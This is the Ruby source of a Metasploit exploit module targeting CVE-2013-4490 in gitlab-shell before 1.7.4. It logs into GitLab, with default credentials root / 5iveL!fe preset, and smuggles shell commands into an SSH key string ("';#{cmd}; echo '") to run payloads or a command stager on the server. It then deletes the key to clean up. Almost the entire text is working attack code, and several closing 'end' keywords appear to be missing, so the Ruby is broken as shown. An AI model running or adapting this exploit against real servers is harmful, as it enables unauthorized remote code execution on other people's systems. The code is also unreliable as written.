Gitlab-shell Code Execution

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::CmdStager

def initialize(info = {})

super(update_info(info,

'Name' => 'Gitlab-shell Code Execution',

'Description' => %q(

This module takes advantage of the addition of authorized

ssh keys in the gitlab-shell functionality of Gitlab. Versions

of gitlab-shell prior to 1.7.4 used the ssh key provided directly

in a system call resulting in a command injection vulnerability. As

this relies on adding an ssh key to an account valid credentials

are required to exploit this vulnerability.

),

'Author' =>

[

'Brandon Knight'

],

'License' => MSF_LICENSE,

'References' =>

[

['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],

['CVE', '2013-4490']

],

'Platform' => 'linux',

'Targets' =>

[

[ 'Linux',

{

'Platform' => 'linux',

'Arch' => ARCH_X86

}

],

[ 'Linux (x64)',

{

'Platform' => 'linux',

'Arch' => ARCH_X86_64

}

],

[ 'Unix (CMD)',

{

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Payload' =>

{

'Compat' =>

{

'RequiredCmd' => 'openssl perl python'

},

'BadChars' => "\x22"

}

],

[ 'Python',

{

'Platform' => 'python',

'Arch' => ARCH_PYTHON,

'Payload' =>

{

'BadChars' => "\x22"

}

]

],

'CmdStagerFlavor' => %w( bourne printf ),

'DisclosureDate' => 'Nov 4 2013',

'DefaultTarget' => 0))

register_options(

[

OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']),

OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']),

OptString.new('TARGETURI', [true, 'The path to Gitlab', '/'])

], self.class)

end

def exploit

login

case target['Platform']

when 'unix'

execute_command(payload.encoded)

when 'python'

execute_command("python -c \\\"#{payload.encoded}\\\"")

when 'linux'

execute_cmdstager(temp: './', linemax: 2800)

end

def execute_command(cmd, _opts = {})

key_id = add_key(cmd)

delete_key(key_id)

end

def check

res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))

if res && res.body && res.body.include?('GitLab')

return Exploit::CheckCode::Detected

else

return Exploit::CheckCode::Unknown

end

def login

username = datastore['USERNAME']

password = datastore['PASSWORD']

signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')

# Get a valid session cookie and authenticity_token for the next step

res = send_request_cgi(

'method' => 'GET',

'cookie' => 'request_method=GET',

'uri' => signin_page

)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res

local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]

auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]

if res.body.include? 'user[email]'

@gitlab_version = 5

user_field = 'user[email]'

else

@gitlab_version = 7

user_field = 'user[login]'

end

# Perform the actual login and get the newly assigned session cookie

res = send_request_cgi(

'method' => 'POST',

'cookie' => local_session_cookie,

'uri' => signin_page,

'vars_post' =>

{

'utf8' => "\xE2\x9C\x93",

'authenticity_token' => auth_token,

"#{user_field}" => username,

'user[password]' => password,

'user[remember_me]' => 0

}

)

fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302

@session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]

fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?

end

def add_key(cmd)

if @gitlab_version == 5

@key_base = normalize_uri(target_uri.path.to_s, 'keys')

else

@key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')

end

# Perform an initial request to get an authenticity_token so the actual

# key addition can be done successfully.

res = send_request_cgi(

'method' => 'GET',

'cookie' => "request_method=GET; #{@session_cookie}",

'uri' => normalize_uri(@key_base, 'new')

)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]

title = rand_text_alphanumeric(16)

key_info = rand_text_alphanumeric(6)

# Generate a random ssh key

key = OpenSSL::PKey::RSA.new 2048

type = key.ssh_type

data = [key.to_blob].pack('m0')

openssh_format = "#{type} #{data}"

# Place the payload in to the key information to perform the command injection

key = "#{openssh_format} #{key_info}';#{cmd}; echo '"

res = send_request_cgi(

'method' => 'POST',

'cookie' => "request_method=GET; #{@session_cookie}",

'uri' => @key_base,

'vars_post' =>

{

'utf8' => "\xE2\x9C\x93",

'authenticity_token' => auth_token,

'key[title]' => title,

'key[key]' => key

}

)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

# Get the newly added key id so it can be used for cleanup

key_id = res.headers['Location'].split('/')[-1]

key_id

end

def delete_key(key_id)

res = send_request_cgi(

'method' => 'GET',

'cookie' => "request_method=GET; #{@session_cookie}",

'uri' => @key_base

)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]

# Remove the key which was added to clean up after ourselves

res = send_request_cgi(

'method' => 'POST',

'cookie' => "#{@session_cookie}",

'uri' => normalize_uri("#{@key_base}", "#{key_id}"),

'vars_post' =>

{

'_method' => 'delete',

'authenticity_token' => auth_token

}

)

fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

end